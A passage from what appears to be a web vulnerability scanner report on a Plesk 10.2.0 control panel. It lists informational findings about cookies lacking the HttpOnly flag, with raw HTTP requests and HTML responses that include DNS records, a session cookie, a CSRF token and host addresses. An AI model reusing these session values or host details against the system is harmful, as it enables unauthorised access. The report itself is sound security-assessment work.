onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@11/properties/" onClick=";lon();">50.23.106.58 / 24</a></td><td>PTR</td><td>vulnerable.host.fqdn.</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if 
(inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_10" value="10" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@10/properties/" onClick=";lon();">ftp.vulnerable.host.fqdn.</a></td><td>CNAME</td><td>vulnerable.host.fqdn.</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_9" value="9" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@9/properties/" onClick=";lon();">ipv4.vulnerable.host.fqdn.</a></td><td>A</td><td>50.23.106.58</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_8" value="8" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@8/properties/" onClick=";lon();">mail.vulnerable.host.fqdn.</a></td><td>A</td><td>50.23.106.58</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" 
class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_6" value="6" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@6/properties/" onClick=";lon();">mssql.vulnerable.host.fqdn.</a></td><td>A</td><td>50.23.106.58</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2" value="2" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@2/properties/" onClick=";lon();">vulnerable.host.fqdn.</a></td><td>NS</td><td>ns.vulnerable.host.fqdn.</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_4" value="4" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@4/properties/" onClick=";lon();">vulnerable.host.fqdn.</a></td><td>A</td><td>50.23.106.58</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" 
class="checkbox" name="del[]" id="del_7" value="7" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@7/properties/" onClick=";lon();">vulnerable.host.fqdn.</a></td><td>MX (10)</td><td>mail.vulnerable.host.fqdn.</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3" value="3" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@3/properties/" onClick=";lon();">ns.vulnerable.host.fqdn.</a></td><td>A</td><td>50.23.106.58</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_16" value="16" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@16/properties/" onClick=";lon();">webmail.vulnerable.host.fqdn.</a></td><td>A</td><td>50.23.106.58</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_15" value="15" 
onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@15/properties/" onClick=";lon();">www.vulnerable.host.fqdn.</a></td><td>CNAME</td><td>vulnerable.host.fqdn.</td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>11 DNS records total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="DNSZoneListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="DNSZoneListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="DNSZoneListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("dnszonelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Imhvc3QiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function DNSZoneListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function DNSZoneListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function DNSZoneListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function DNSZoneListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.DNSZoneListSelectAll.checked;
                           DNSZoneListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function DNSZoneListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function DNSZoneListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function DNSZoneListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   DNSZoneListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function DNSZoneListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function DNSZoneListSearchShow()
           {
               var sc = document.getElementById("DNSZoneListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("DNSZoneListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function DNSZoneListSearchHide()
           {
               var sc = document.getElementById("DNSZoneListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("DNSZoneListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function DNSZoneListRemove(f)
           {
               if (0 == DNSZoneListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/dns/resource-record@multi/delete/";
               lsubmit(f);
               return false;
           }
       </script>

</td></tr></table></fieldset>

</div>



</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.20. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/domain-alias@

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/domain-alias@

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/domain-alias@ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/web/view
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:14:20 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:14:20 GMT
Connection: close
Content-Length: 15736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fdomain-alias%2540%26src%3D%252Fsmb%252Fweb%252Fview%252Ftype%252Fdomain-aliases%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Domain aliases</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/domain_aliases/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/domain-alias@" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <SPAN class="commonButton" id="bid-domain-alias-add-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Permission denied.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_domain_alias_add" disabled id="buttonid-domain-alias-add-disabled" type="button">Add Domain Alias</BUTTON><SPAN id="spanid-domain-alias-add-disabled">Add Domain Alias</SPAN></SPAN>
       </div>

   </td></tr></table></fieldset>
</div>

<div class="listArea">

<fieldset>

<legend>Domain aliases</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>


           <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Domain alias is enabled."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"Domain alias is disabled."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"Domain alias is disabled because the domain is turned off."}]); }

           function z() { tooltip.hide(); }
           </script>
       <div class="paging pagingTop noList">No Domain aliases</div><div class="paging pagingBottom noList"></div><script>SetCookie("domainaliaseslist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function DomainAliasesListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function DomainAliasesListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function DomainAliasesListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function DomainAliasesListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.DomainAliasesListSelectAll.checked;
                           DomainAliasesListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function DomainAliasesListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function DomainAliasesListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function DomainAliasesListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   DomainAliasesListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function DomainAliasesListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function DomainAliasesListSearchShow()
           {
               var sc = document.getElementById("DomainAliasesListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("DomainAliasesListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function DomainAliasesListSearchHide()
           {
               var sc = document.getElementById("DomainAliasesListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("DomainAliasesListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function DomainAliasesListRemove(f)
           {
               if (0 == DomainAliasesListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/domains/domain_aliases_remove.php";
               lsubmit(f);
               return false;
           }
       </script>

</td></tr></table></fieldset>

</div>



</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.21. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/aspdotnet/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/aspdotnet/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/hosting/aspdotnet/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:14:26 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:14:28 GMT
Connection: close
Content-Length: 46372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
